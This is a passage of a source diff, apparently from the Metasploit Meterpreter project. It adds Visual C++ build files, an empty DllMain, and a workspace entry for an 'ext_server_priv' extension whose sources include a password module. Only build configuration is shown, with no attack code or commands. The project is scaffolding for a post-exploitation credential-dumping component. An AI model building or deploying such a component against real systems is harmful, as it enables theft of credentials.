*/
BOOL WINAPI DllMain(HINSTANCE module, DWORD reason, LPVOID reserved)
{
return TRUE;
}

120
c/meterpreter/workspace/ext_server_priv/ext_server_priv.dsp Executable file
View File

@ -0,0 +1,120 @@
# Microsoft Developer Studio Project File - Name="ext_server_priv" - Package Owner=<4>
# Microsoft Developer Studio Generated Build File, Format Version 6.00
# ** DO NOT EDIT **
# TARGTYPE "Win32 (x86) Dynamic-Link Library" 0x0102
CFG=ext_server_priv - Win32 Debug
!MESSAGE This is not a valid makefile. To build this project using NMAKE,
!MESSAGE use the Export Makefile command and run
!MESSAGE
!MESSAGE NMAKE /f "ext_server_priv.mak".
!MESSAGE
!MESSAGE You can specify a configuration when running NMAKE
!MESSAGE by defining the macro CFG on the command line. For example:
!MESSAGE
!MESSAGE NMAKE /f "ext_server_priv.mak" CFG="ext_server_priv - Win32 Debug"
!MESSAGE
!MESSAGE Possible choices for configuration are:
!MESSAGE
!MESSAGE "ext_server_priv - Win32 Release" (based on "Win32 (x86) Dynamic-Link Library")
!MESSAGE "ext_server_priv - Win32 Debug" (based on "Win32 (x86) Dynamic-Link Library")
!MESSAGE
# Begin Project
# PROP AllowPerConfigDependencies 0
# PROP Scc_ProjName ""
# PROP Scc_LocalPath ""
CPP=cl.exe
MTL=midl.exe
RSC=rc.exe
!IF "$(CFG)" == "ext_server_priv - Win32 Release"
# PROP BASE Use_MFC 0
# PROP BASE Use_Debug_Libraries 0
# PROP BASE Output_Dir "Release"
# PROP BASE Intermediate_Dir "Release"
# PROP BASE Target_Dir ""
# PROP Use_MFC 0
# PROP Use_Debug_Libraries 0
# PROP Output_Dir "Release"
# PROP Intermediate_Dir "Release"
# PROP Ignore_Export_Lib 0
# PROP Target_Dir ""
# ADD BASE CPP /nologo /MT /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "EXT_SERVER_PRIV_EXPORTS" /YX /FD /c
# ADD CPP /nologo /MT /W3 /GX /O2 /I "..\..\source\extensions\priv\server" /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "EXT_SERVER_PRIV_EXPORTS" /Yu"precomp.h" /FD /c
# ADD BASE MTL /nologo /D "NDEBUG" /mktyplib203 /win32
# ADD MTL /nologo /D "NDEBUG" /mktyplib203 /win32
# ADD BASE RSC /l 0x409 /d "NDEBUG"
# ADD RSC /l 0x409 /d "NDEBUG"
BSC32=bscmake.exe
# ADD BASE BSC32 /nologo
# ADD BSC32 /nologo
LINK32=link.exe
# ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /dll /machine:I386
# ADD LINK32 psapi.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /dll /machine:I386
!ELSEIF "$(CFG)" == "ext_server_priv - Win32 Debug"
# PROP BASE Use_MFC 0
# PROP BASE Use_Debug_Libraries 1
# PROP BASE Output_Dir "Debug"
# PROP BASE Intermediate_Dir "Debug"
# PROP BASE Target_Dir ""
# PROP Use_MFC 0
# PROP Use_Debug_Libraries 1
# PROP Output_Dir "Debug"
# PROP Intermediate_Dir "Debug"
# PROP Ignore_Export_Lib 0
# PROP Target_Dir ""
# ADD BASE CPP /nologo /MTd /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "EXT_SERVER_PRIV_EXPORTS" /YX /FD /GZ /c
# ADD CPP /nologo /MTd /W3 /Gm /GX /ZI /Od /I "..\..\source\extensions\priv\server" /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "EXT_SERVER_PRIV_EXPORTS" /Yu"precomp.h" /FD /GZ /c
# ADD BASE MTL /nologo /D "_DEBUG" /mktyplib203 /win32
# ADD MTL /nologo /D "_DEBUG" /mktyplib203 /win32
# ADD BASE RSC /l 0x409 /d "_DEBUG"
# ADD RSC /l 0x409 /d "_DEBUG"
BSC32=bscmake.exe
# ADD BASE BSC32 /nologo
# ADD BSC32 /nologo
LINK32=link.exe
# ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /dll /debug /machine:I386 /pdbtype:sept
# ADD LINK32 psapi.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /dll /debug /machine:I386 /pdbtype:sept
!ENDIF
# Begin Target
# Name "ext_server_priv - Win32 Release"
# Name "ext_server_priv - Win32 Debug"
# Begin Group "Source"
# PROP Default_Filter ""
# Begin Group "Password"
# PROP Default_Filter ""
# Begin Source File
SOURCE=..\..\source\extensions\priv\server\passwd.c
# End Source File
# Begin Source File
SOURCE=..\..\source\extensions\priv\server\passwd.h
# End Source File
# End Group
# Begin Source File
SOURCE=..\..\source\extensions\priv\server\precomp.h
# End Source File
# Begin Source File
SOURCE=..\..\source\extensions\priv\server\priv.c
# ADD CPP /Yc"precomp.h"
# End Source File
# Begin Source File
SOURCE=..\..\source\extensions\priv\priv.h
# End Source File
# End Group
# End Target
# End Project

15
c/meterpreter/workspace/meterpreter.dsw
View File

@ -15,6 +15,21 @@ Package=<4>
############################################################################### ###############################################################################
Project: "ext_server_priv"=.\ext_server_priv\ext_server_priv.dsp - Package Owner=<4>
Package=<5>
{{{
}}}
Package=<4>
{{{
Begin Project Dependency
Project_Dep_Name metsrv
End Project Dependency
}}}
###############################################################################
Project: "ext_server_stdapi"=.\ext_server_stdapi\ext_server_stdapi.dsp - Package Owner=<4> Project: "ext_server_stdapi"=.\ext_server_stdapi\ext_server_stdapi.dsp - Package Owner=<4>
Package=<5> Package=<5>